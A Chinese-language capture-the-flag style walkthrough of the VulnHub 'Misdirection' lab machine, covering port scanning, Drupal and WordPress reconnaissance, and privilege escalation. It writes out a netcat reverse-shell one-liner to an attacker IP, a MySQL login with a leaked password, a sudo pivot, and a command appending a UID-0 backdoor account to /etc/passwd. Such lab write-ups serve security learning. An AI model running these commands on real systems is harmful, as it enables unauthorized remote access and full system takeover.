下载链接见:
https://download.vulnhub.com/misdirection/Misdirection.zip
这里我们需要看
首先我们使用arp-scan对内网主机进行发现
随后对靶机进行端口扫描,有一个22端口ssh协议,80端口开启了http协议,还有3306的mysql数据库端口,8080也是http协议
访问80端口,并从wappalyzer信息收集插件看到这个cms是Drupal
随后点击进入到这个界面,告诉我们说这个系统是开源的,并且有源代码,还有一个下载选项
登录框尝试万能密码,却限制了我们只能使用邮箱登录,随后我们尝试注册一个用户
却提示了一个信息,无法发送电子邮件
随后这里有一个Source Code源码,
查看这个作者的源码中包含了一个admin,(其他代码信息没啥利用价值)
尝试访问却提示管理因不安全通道而关闭
突然发现我们目录扫描还没扫呢,通过扫描结果也能看到目标站点设置了防目录扫描功能
切换思路,我们来到8080端口,意外的发现这是一个wordpress的内容管理系统
按照常规的方式,首先是后台的爆破 http://10.10.10.129:8080/wordpress/wp-admin
但是呢它重定向到了另一个页面,而且这个页面并不是在当前的这个界面
当我利用dirb进行目录扫描的时候呢,不扫wordpress这个命令,有一个debug发现了新的突破口
当我想要创建一个交互式的终端的时候呢,发现使用su命令并不能正常的使用
python3 -c 'import pty;pty.spawn("/bin/bash")'
只能被迫使用nc进行反弹shell,反弹成功后就能利用su命令切换用户啦
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f
接下来就是信息收集,一条龙下来就可,也可以使用自定义脚本
学习文章参考:
全部获取完成后,你会发现几个关键的点,sudo 可以利用,有一个/bin/bash,但是需要brexit用户才能用奥
还有个思路就是前端有wordpress,那么必定和数据库有交互,我们来看配置文件,能看到密码
找到了第一个和密码相关的,那么这个密码是不是root用户的密码呢?很明显,不会让你这么轻易获得root权限的
登录数据库
mysql -ublog -pabcdefghijklmnopqrstuv
找用户表
破解失败了,不过不要紧
我们继续回到那个sudo,他说了要求brexit用户才能执行那个/bin/bash,那么久指定一个用户吧
sudo -u brexit /bin/bash
相当的棒,提权成功,经过一番折磨后,该收集的信息都收集了,直到我翻到.viminfo,看到了用户编辑过/etc/passwd,这个文件主要记录了一些vim的编辑历史
查看权限,这下不就有思路啦(那么多信息收集命令,既然少了这么重要的东西。。。。。。赶紧补上)
然后我们仿照/etc/passwd的格式生成一个账号 baibaixiaoyu 和密码123456,将这个用户分到root组下
echo 'baibaixiaoyu:$1$oFd2MoKR$eVjr6Fe7JWwjAPEfaTQSy.:0:0:root:/root:/bin/bash' >> /etc/passwd
至此渗透结束
往期推荐
本站小部分内容转载于互联网,如有侵权还请联系
暂无评论内容